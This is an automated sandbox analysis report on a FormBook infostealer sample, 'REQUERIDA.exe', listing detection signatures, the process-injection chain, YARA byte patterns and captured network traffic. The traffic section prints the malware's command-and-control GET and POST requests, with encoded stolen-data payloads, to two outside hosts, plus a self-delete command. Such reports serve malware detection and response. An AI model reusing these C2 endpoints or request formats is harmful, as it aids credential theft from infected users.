Loading ...

Play interactive tourEdit tour

Analysis Report REQUERIDA.exe

Overview

General Information

Sample Name:REQUERIDA.exe
Analysis ID:255317
MD5:e07d5b6d29e7cae1ea8546b4783601b8
SHA1:d5c823bdee28ccf2bd18e683eca270d6c031cb72
SHA256:3ec51daa2ad133cfcdce1ffca7081f96ee58d9b5c2d302cee732e6e2cc3d8cc6

Most interesting Screenshot:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Benign windows process drops PE files
Detected FormBook malware
Malicious sample detected (through community Yara rule)
System process connects to network (likely due to code injection or exploit)
Yara detected AntiVM_3
Yara detected FormBook
Injects a PE file into a foreign processes
Machine Learning detection for dropped file
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Modifies the prolog of user mode functions (user mode inline hooks)
Queues an APC in another process (thread injection)
Sample uses process hollowing technique
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to detect virtualization through RDTSC time measurements
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file access)
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to communicate with device drivers
Contains functionality to launch a process as a different user
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Enables debug privileges
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
May sleep (evasive loops) to hinder dynamic analysis
PE file contains strange resources
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Startup

  • System is w10x64
  • REQUERIDA.exe (PID: 6216 cmdline: 'C:\Users\user\Desktop\REQUERIDA.exe' MD5: E07D5B6D29E7CAE1EA8546B4783601B8)
    • REQUERIDA.exe (PID: 6312 cmdline: C:\Users\user\Desktop\REQUERIDA.exe MD5: E07D5B6D29E7CAE1EA8546B4783601B8)
      • explorer.exe (PID: 3420 cmdline: MD5: AD5296B280E8F522A8A897C96BAB0E1D)
        • cmd.exe (PID: 6780 cmdline: C:\Windows\SysWOW64\cmd.exe MD5: F3BDBE3BB6F734E357235F4D5898582D)
          • cmd.exe (PID: 6444 cmdline: /c del 'C:\Users\user\Desktop\REQUERIDA.exe' MD5: F3BDBE3BB6F734E357235F4D5898582D)
            • conhost.exe (PID: 6180 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
        • user7n7plnxh.exe (PID: 644 cmdline: C:\Program Files (x86)\Au2k\user7n7plnxh.exe MD5: E07D5B6D29E7CAE1EA8546B4783601B8)
          • user7n7plnxh.exe (PID: 5668 cmdline: C:\Program Files (x86)\Au2k\user7n7plnxh.exe MD5: E07D5B6D29E7CAE1EA8546B4783601B8)
        • user7n7plnxh.exe (PID: 5484 cmdline: 'C:\Program Files (x86)\Au2k\user7n7plnxh.exe' MD5: E07D5B6D29E7CAE1EA8546B4783601B8)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000001.00000002.1330781052.00000000010A0000.00000040.00000001.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
    00000001.00000002.1330781052.00000000010A0000.00000040.00000001.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
    • 0x98b8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x9b22:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x157a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x15291:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x158a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x15a1f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0xa69a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
    • 0x1450c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0xb393:$sequence_7: 66 89 0C 02 5B 8B E5 5D
    • 0x1ab17:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0x1bb1a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
    00000001.00000002.1330781052.00000000010A0000.00000040.00000001.sdmpFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
    • 0x18429:$sqlite3step: 68 34 1C 7B E1
    • 0x1853c:$sqlite3step: 68 34 1C 7B E1
    • 0x18458:$sqlite3text: 68 38 2A 90 C5
    • 0x1857d:$sqlite3text: 68 38 2A 90 C5
    • 0x1846b:$sqlite3blob: 68 53 D8 7F 8C
    • 0x18593:$sqlite3blob: 68 53 D8 7F 8C
    00000006.00000002.1543213896.00000000032C0000.00000004.00000001.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
      00000006.00000002.1543213896.00000000032C0000.00000004.00000001.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
      • 0x98b8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x9b22:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x157a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
      • 0x15291:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
      • 0x158a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
      • 0x15a1f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
      • 0xa69a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
      • 0x1450c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
      • 0xb393:$sequence_7: 66 89 0C 02 5B 8B E5 5D
      • 0x1ab17:$sequence_8: 3C 54 74 04 3C 74 75 F4
      • 0x1bb1a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
      Click to see the 29 entries

      Unpacked PEs

      SourceRuleDescriptionAuthorStrings
      1.2.REQUERIDA.exe.400000.0.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
        1.2.REQUERIDA.exe.400000.0.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
        • 0x8ab8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x8d22:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x149a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
        • 0x14491:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
        • 0x14aa7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
        • 0x14c1f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
        • 0x989a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
        • 0x1370c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
        • 0xa593:$sequence_7: 66 89 0C 02 5B 8B E5 5D
        • 0x19d17:$sequence_8: 3C 54 74 04 3C 74 75 F4
        • 0x1ad1a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
        1.2.REQUERIDA.exe.400000.0.unpackFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
        • 0x17629:$sqlite3step: 68 34 1C 7B E1
        • 0x1773c:$sqlite3step: 68 34 1C 7B E1
        • 0x17658:$sqlite3text: 68 38 2A 90 C5
        • 0x1777d:$sqlite3text: 68 38 2A 90 C5
        • 0x1766b:$sqlite3blob: 68 53 D8 7F 8C
        • 0x17793:$sqlite3blob: 68 53 D8 7F 8C
        1.2.REQUERIDA.exe.400000.0.raw.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
          1.2.REQUERIDA.exe.400000.0.raw.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
          • 0x98b8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x9b22:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x157a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
          • 0x15291:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
          • 0x158a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
          • 0x15a1f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
          • 0xa69a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
          • 0x1450c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
          • 0xb393:$sequence_7: 66 89 0C 02 5B 8B E5 5D
          • 0x1ab17:$sequence_8: 3C 54 74 04 3C 74 75 F4
          • 0x1bb1a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
          Click to see the 7 entries

          Sigma Overview

          No Sigma rule has matched

          Signature Overview

          Click to jump to signature section

          Show All Signature Results

          AV Detection:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 00000001.00000002.1330781052.00000000010A0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000002.1543213896.00000000032C0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000002.1539075288.0000000002BA0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000019.00000002.1537258723.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000002.1542910573.0000000003290000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.1330562113.0000000000C60000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.1280189026.0000000004A67000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.1330269509.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000019.00000002.1539944232.00000000013E0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000017.00000002.1540880092.00000000049B3000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 1.2.REQUERIDA.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.REQUERIDA.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 25.2.user7n7plnxh.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 25.2.user7n7plnxh.exe.400000.0.unpack, type: UNPACKEDPE
          Machine Learning detection for dropped fileShow sources
          Source: C:\Users\user\AppData\Local\Temp\Au2k\user7n7plnxh.exeJoe Sandbox ML: detected
          Machine Learning detection for sampleShow sources
          Source: REQUERIDA.exeJoe Sandbox ML: detected
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 6_2_009EB89C GetFileAttributesW,GetLastError,FindFirstFileW,GetLastError,FindClose,memset,??_V@YAXPAX@Z,FindNextFileW,SetLastError,??_V@YAXPAX@Z,GetLastError,FindClose,6_2_009EB89C
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 6_2_009F68BA FindFirstFileExW,GetLastError,GetProcessHeap,HeapAlloc,GetProcessHeap,HeapReAlloc,FindNextFileW,FindClose,GetLastError,FindClose,6_2_009F68BA
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 6_2_009F245C FindFirstFileW,FindClose,memcpy,_wcsnicmp,_wcsicmp,memmove,6_2_009F245C
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 6_2_009E85EA memset,FindFirstFileW,FindClose,FindFirstFileW,FindNextFileW,FindClose,??_V@YAXPAX@Z,GetLastError,SetFileAttributesW,_wcsnicmp,GetFullPathNameW,SetLastError,GetLastError,SetFileAttributesW,6_2_009E85EA
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 6_2_00A031DC FindFirstFileW,FindNextFileW,FindClose,6_2_00A031DC
          Source: C:\Users\user\Desktop\REQUERIDA.exeCode function: 4x nop then mov ecx, dword ptr [ebp-38h]0_2_0579946F
          Source: C:\Users\user\Desktop\REQUERIDA.exeCode function: 4x nop then mov ecx, dword ptr [ebp-38h]0_2_057963BC
          Source: global trafficHTTP traffic detected: GET /m5gz/?_XL000=kjyTHG7M5+o/Kq+xwhbVXGcr7fjqvHhbYflT6qoyig2y0FYlKC4jWFLbARP9Es016vDL&DzuD=WBjPZrc0f HTTP/1.1Host: www.wrn23internetradio.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /m5gz/?_XL000=N1QJ5f5PgoHrxTkIrgSXDO6cNiqUEFPDvQ7hq5VcmSYef3bomSQTX9iB3mXU+tFBt4fC&DzuD=WBjPZrc0f HTTP/1.1Host: www.emarketschool.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: POST /m5gz/ HTTP/1.1Host: www.emarketschool.comConnection: closeContent-Length: 412Cache-Control: no-cacheOrigin: http://www.emarketschool.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.emarketschool.com/m5gz/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 5f 58 4c 30 30 30 3d 46 58 63 7a 6e 36 4a 4f 6d 34 33 43 68 41 39 38 38 45 50 70 43 75 32 4a 62 7a 7a 47 42 57 44 6d 7a 56 36 56 78 37 59 43 76 69 6f 4b 50 30 50 32 77 69 74 4e 43 6f 65 44 76 55 58 71 78 5f 46 47 77 59 47 4b 32 45 55 76 73 66 31 4b 37 79 6f 4c 62 39 41 4d 69 61 36 53 54 4b 72 69 35 6b 48 56 41 63 4e 76 49 32 6b 30 49 6e 36 49 39 6d 5a 36 57 65 65 69 37 37 76 4f 59 31 65 74 45 30 67 54 74 69 30 6b 4a 47 51 30 70 4a 6b 59 4e 73 4c 55 41 4e 34 6c 78 52 6d 78 57 7a 61 63 66 63 30 74 78 52 7e 77 46 4c 46 7a 5a 48 4a 30 47 2d 28 75 61 4b 51 35 68 6a 4a 6a 36 34 65 57 58 46 42 70 34 37 28 55 58 30 79 69 30 36 4f 67 6a 41 41 68 4a 4c 58 51 53 38 42 35 63 58 44 56 47 39 6c 55 4b 57 48 4a 6f 72 75 68 36 64 65 53 34 49 54 78 70 4c 76 73 56 36 77 33 50 57 32 72 52 49 59 7a 45 31 50 4f 68 72 5a 58 50 4d 4e 6c 59 46 34 6c 41 39 68 2d 36 61 63 58 35 50 69 4b 39 48 53 42 55 43 35 52 4d 56 7e 52 63 37 73 4a 58 48 32 45 51 59 42 2d 4b 79 66 43 58 67 7a 52 55 37 47 48 33 65 34 50 54 6f 6d 6a 52 64 68 4c 46 5f 54 68 45 57 66 6d 57 48 33 47 73 34 36 32 57 35 6e 68 38 30 50 68 72 34 56 48 6f 49 55 64 7e 67 33 73 50 47 31 53 50 51 56 50 72 71 4b 36 7e 39 7e 69 71 65 6b 58 67 66 4a 30 74 47 73 53 68 6c 4a 6e 48 41 29 2e 00 00 00 00 00 00 00 00 Data Ascii: _XL000=FXczn6JOm43ChA988EPpCu2JbzzGBWDmzV6Vx7YCvioKP0P2witNCoeDvUXqx_FGwYGK2EUvsf1K7yoLb9AMia6STKri5kHVAcNvI2k0In6I9mZ6Weei77vOY1etE0gTti0kJGQ0pJkYNsLUAN4lxRmxWzacfc0txR~wFLFzZHJ0G-(uaKQ5hjJj64eWXFBp47(UX0yi06OgjAAhJLXQS8B5cXDVG9lUKWHJoruh6deS4ITxpLvsV6w3PW2rRIYzE1POhrZXPMNlYF4lA9h-6acX5PiK9HSBUC5RMV~Rc7sJXH2EQYB-KyfCXgzRU7GH3e4PTomjRdhLF_ThEWfmWH3Gs462W5nh80Phr4VHoIUd~g3sPG1SPQVPrqK6~9~iqekXgfJ0tGsShlJnHA).
          Source: global trafficHTTP traffic detected: POST /m5gz/ HTTP/1.1Host: www.emarketschool.comConnection: closeContent-Length: 182716Cache-Control: no-cacheOrigin: http://www.emarketschool.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.emarketschool.com/m5gz/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 5f 58 4c 30 30 30 3d 46 58 63 7a 6e 34 6f 39 6b 49 79 61 77 44 4a 68 7e 56 28 78 54 36 79 66 4e 41 32 43 44 42 33 59 36 6c 57 46 78 34 52 46 32 33 45 69 59 6b 28 32 68 41 55 45 64 6f 65 43 70 55 58 70 31 5f 4a 51 76 66 7a 47 32 41 46 4b 73 66 39 4a 70 77 78 44 62 4e 41 62 69 36 47 45 44 36 75 2d 35 6e 6a 47 42 2d 42 33 43 54 38 30 47 33 79 47 78 6e 6f 6d 52 61 47 68 6e 5f 50 42 56 51 4b 77 45 6a 78 75 74 41 49 57 4b 48 63 32 75 36 34 54 43 4d 36 39 45 65 49 32 28 68 69 79 5a 55 79 70 62 50 51 68 32 54 61 34 62 5a 74 30 54 58 52 36 51 74 33 6d 50 72 6b 41 36 51 68 64 36 35 62 6a 54 32 46 34 38 37 54 4d 56 46 7e 45 38 75 65 69 28 48 74 68 4e 4a 50 48 55 38 77 68 44 47 79 42 43 73 49 51 4a 56 28 6e 6d 70 65 53 39 76 71 65 33 61 4b 45 71 61 72 6b 5a 62 41 59 46 31 6e 72 47 4a 34 46 48 33 6a 6b 76 72 59 65 4a 4d 4e 70 53 68 4d 4e 45 50 4e 4c 72 66 55 32 6c 35 69 5a 39 57 7e 53 58 47 45 41 43 55 57 41 61 4c 67 7a 66 58 47 38 55 36 74 6c 61 78 44 32 4b 51 7a 46 55 35 7e 32 33 65 34 44 54 73 79 64 44 50 64 4c 45 76 7a 55 49 56 48 71 51 48 33 68 75 6f 71 34 63 71 50 78 38 30 48 68 35 35 6c 39 6e 62 6b 64 70 43 76 6a 4f 6a 5a 53 43 41 56 50 7e 36 4c 7a 28 4f 6e 55 68 66 38 6e 6f 39 63 68 31 44 78 52 70 52 63 7a 59 34 32 4c 4a 67 51 78 62 51 76 4a 61 47 66 54 6c 7a 33 42 6a 2d 32 36 6b 52 47 38 76 63 58 52 31 37 74 71 4d 50 6a 37 6e 4f 35 4c 5a 55 42 42 51 7a 33 38 49 37 76 47 49 39 77 73 49 4d 52 46 70 4e 31 67 50 5a 4a 45 76 30 6d 39 50 70 45 39 28 6a 46 42 50 47 78 37 57 38 32 35 79 6f 6d 76 66 39 46 52 41 32 73 55 6a 2d 65 6a 4f 4e 7a 4b 34 6b 6e 74 44 48 51 37 54 66 74 6b 50 5a 39 7a 6f 58 57 73 59 38 75 71 34 46 41 7a 61 5f 28 4f 62 47 68 73 64 73 73 59 31 64 6a 4c 7e 47 70 77 38 70 56 6b 45 39 64 67 4d 4e 79 62 66 44 76 75 6d 5f 58 65 59 38 79 30 6b 56 57 32 50 6d 6d 35 53 49 53 74 4c 4b 4c 52 51 49 38 6c 39 6a 67 63 76 69 45 54 48 74 4e 69 70 46 78 31 75 64 6d 70 4a 52 6a 47 58 63 57 43 56 78 73 7a 6d 39 5a 73 6f 6c 42 78 55 72 36 52 6e 7a 34 6f 67 4e 54 50 75 46 49 4f 48 51 4e 41 7a 58 4a 52 51 4d 39 70 73 44 32 52 67 7a 71 53 67 33 74 4e 57 54 45 68 63 75 75 35 6c 62 4f 4d 56 46 77 78 4f 49 31 31 49 38 73 74 68 75 76 61 7a 5f 75 6c 53 4f 43 41 7e 6a 78 68 4a 33 52 33 6c 33 4c 69 6b 61 6a 6a 32 58 74 76 74 59 47 63 69 6c 46 31 78 7a 70 68 75 32 47 32 72 64 48 51 4b 42 58 4d 35 5a 46 50 70 39 74 57 54 6c 51 50 62 6d 6e 6a 55 7a 4d 31 66 35 71 37 50 6c 6a 4e 6e 6e 6f 4d 50 71 68 41 69 45 64 58 41 72 69 31 6f 44 7a 33 62 68 67 38 44 38 46 57 41 30 4e 47 52 63 37 57 73 63 66 71 46 6d 6a 6f 42 39 76 4d 65 75 79 53 7a 4f 58 65 75 6b 57 79 31 32
          Source: global trafficHTTP traffic detected: GET /m5gz/?_XL000=kjyTHG7M5+o/Kq+xwhbVXGcr7fjqvHhbYflT6qoyig2y0FYlKC4jWFLbARP9Es016vDL&DzuD=WBjPZrc0f HTTP/1.1Host: www.wrn23internetradio.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /m5gz/?_XL000=N1QJ5f5PgoHrxTkIrgSXDO6cNiqUEFPDvQ7hq5VcmSYef3bomSQTX9iB3mXU+tFBt4fC&DzuD=WBjPZrc0f HTTP/1.1Host: www.emarketschool.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: explorer.exe, 00000002.00000000.1310136384.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: <FavoriteIcon>http://www.facebook.com/favicon.ico</FavoriteIcon> equals www.facebook.com (Facebook)
          Source: explorer.exe, 00000002.00000000.1310136384.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: <FavoriteIcon>http://www.myspace.com/favicon.ico</FavoriteIcon> equals www.myspace.com (Myspace)
          Source: explorer.exe, 00000002.00000000.1310136384.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: <FavoriteIcon>http://www.rambler.ru/favicon.ico</FavoriteIcon> equals www.rambler.ru (Rambler)
          Source: explorer.exe, 00000002.00000000.1310136384.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: <URL>http://www.facebook.com/</URL> equals www.facebook.com (Facebook)
          Source: explorer.exe, 00000002.00000000.1310136384.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: <URL>http://www.rambler.ru/</URL> equals www.rambler.ru (Rambler)
          Source: unknownDNS traffic detected: queries for: g.msn.com
          Source: unknownHTTP traffic detected: POST /m5gz/ HTTP/1.1Host: www.emarketschool.comConnection: closeContent-Length: 412Cache-Control: no-cacheOrigin: http://www.emarketschool.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.emarketschool.com/m5gz/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 5f 58 4c 30 30 30 3d 46 58 63 7a 6e 36 4a 4f 6d 34 33 43 68 41 39 38 38 45 50 70 43 75 32 4a 62 7a 7a 47 42 57 44 6d 7a 56 36 56 78 37 59 43 76 69 6f 4b 50 30 50 32 77 69 74 4e 43 6f 65 44 76 55 58 71 78 5f 46 47 77 59 47 4b 32 45 55 76 73 66 31 4b 37 79 6f 4c 62 39 41 4d 69 61 36 53 54 4b 72 69 35 6b 48 56 41 63 4e 76 49 32 6b 30 49 6e 36 49 39 6d 5a 36 57 65 65 69 37 37 76 4f 59 31 65 74 45 30 67 54 74 69 30 6b 4a 47 51 30 70 4a 6b 59 4e 73 4c 55 41 4e 34 6c 78 52 6d 78 57 7a 61 63 66 63 30 74 78 52 7e 77 46 4c 46 7a 5a 48 4a 30 47 2d 28 75 61 4b 51 35 68 6a 4a 6a 36 34 65 57 58 46 42 70 34 37 28 55 58 30 79 69 30 36 4f 67 6a 41 41 68 4a 4c 58 51 53 38 42 35 63 58 44 56 47 39 6c 55 4b 57 48 4a 6f 72 75 68 36 64 65 53 34 49 54 78 70 4c 76 73 56 36 77 33 50 57 32 72 52 49 59 7a 45 31 50 4f 68 72 5a 58 50 4d 4e 6c 59 46 34 6c 41 39 68 2d 36 61 63 58 35 50 69 4b 39 48 53 42 55 43 35 52 4d 56 7e 52 63 37 73 4a 58 48 32 45 51 59 42 2d 4b 79 66 43 58 67 7a 52 55 37 47 48 33 65 34 50 54 6f 6d 6a 52 64 68 4c 46 5f 54 68 45 57 66 6d 57 48 33 47 73 34 36 32 57 35 6e 68 38 30 50 68 72 34 56 48 6f 49 55 64 7e 67 33 73 50 47 31 53 50 51 56 50 72 71 4b 36 7e 39 7e 69 71 65 6b 58 67 66 4a 30 74 47 73 53 68 6c 4a 6e 48 41 29 2e 00 00 00 00 00 00 00 00 Data Ascii: _XL000=FXczn6JOm43ChA988EPpCu2JbzzGBWDmzV6Vx7YCvioKP0P2witNCoeDvUXqx_FGwYGK2EUvsf1K7yoLb9AMia6STKri5kHVAcNvI2k0In6I9mZ6Weei77vOY1etE0gTti0kJGQ0pJkYNsLUAN4lxRmxWzacfc0txR~wFLFzZHJ0G-(uaKQ5hjJj64eWXFBp47(UX0yi06OgjAAhJLXQS8B5cXDVG9lUKWHJoruh6deS4ITxpLvsV6w3PW2rRIYzE1POhrZXPMNlYF4lA9h-6acX5PiK9HSBUC5RMV~Rc7sJXH2EQYB-KyfCXgzRU7GH3e4PTomjRdhLF_ThEWfmWH3Gs462W5nh80Phr4VHoIUd~g3sPG1SPQVPrqK6~9~iqekXgfJ0tGsShlJnHA).
          Source: explorer.exe, 00000002.00000000.1309848471.0000000012B70000.00000002.00000001.sdmpString found in binary or memory: http://%s.com
          Source: explorer.exe, 00000002.00000000.1310136384.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://amazon.fr/
          Source: explorer.exe, 00000002.00000000.1310136384.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://ariadna.elmundo.es/
          Source: explorer.exe, 00000002.00000000.1310136384.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://ariadna.elmundo.es/favicon.ico
          Source: explorer.exe, 00000002.00000000.1310136384.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://arianna.libero.it/
          Source: explorer.exe, 00000002.00000000.1310136384.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://arianna.libero.it/favicon.ico
          Source: explorer.exe, 00000002.00000000.1310136384.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://asp.usatoday.com/
          Source: explorer.exe, 00000002.00000000.1310136384.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://asp.usatoday.com/favicon.ico
          Source: explorer.exe, 00000002.00000000.1310136384.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://auone.jp/favicon.ico
          Source: explorer.exe, 00000002.00000000.1309848471.0000000012B70000.00000002.00000001.sdmpString found in binary or memory: http://auto.search.msn.com/response.asp?MT=
          Source: explorer.exe, 00000002.00000000.1310136384.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://br.search.yahoo.com/
          Source: explorer.exe, 00000002.00000000.1310136384.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://browse.guardian.co.uk/
          Source: explorer.exe, 00000002.00000000.1310136384.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://browse.guardian.co.uk/favicon.ico
          Source: explorer.exe, 00000002.00000000.1310136384.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://busca.buscape.com.br/
          Source: explorer.exe, 00000002.00000000.1310136384.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://busca.buscape.com.br/favicon.ico
          Source: explorer.exe, 00000002.00000000.1310136384.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://busca.estadao.com.br/favicon.ico
          Source: explorer.exe, 00000002.00000000.1310136384.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://busca.igbusca.com.br/
          Source: explorer.exe, 00000002.00000000.1310136384.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://busca.igbusca.com.br//app/static/images/favicon.ico
          Source: explorer.exe, 00000002.00000000.1310136384.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://busca.orange.es/
          Source: explorer.exe, 00000002.00000000.1310136384.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://busca.uol.com.br/
          Source: explorer.exe, 00000002.00000000.1310136384.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://busca.uol.com.br/favicon.ico
          Source: explorer.exe, 00000002.00000000.1310136384.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://buscador.lycos.es/
          Source: explorer.exe, 00000002.00000000.1310136384.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://buscador.terra.com.br/
          Source: explorer.exe, 00000002.00000000.1310136384.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://buscador.terra.com/
          Source: explorer.exe, 00000002.00000000.1310136384.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://buscador.terra.com/favicon.ico
          Source: explorer.exe, 00000002.00000000.1310136384.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://buscador.terra.es/
          Source: explorer.exe, 00000002.00000000.1310136384.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://buscar.ozu.es/
          Source: explorer.exe, 00000002.00000000.1310136384.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://buscar.ya.com/
          Source: explorer.exe, 00000002.00000000.1310136384.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://busqueda.aol.com.mx/
          Source: explorer.exe, 00000002.00000000.1310136384.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://cerca.lycos.it/
          Source: explorer.exe, 00000002.00000000.1310136384.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://cgi.search.biglobe.ne.jp/
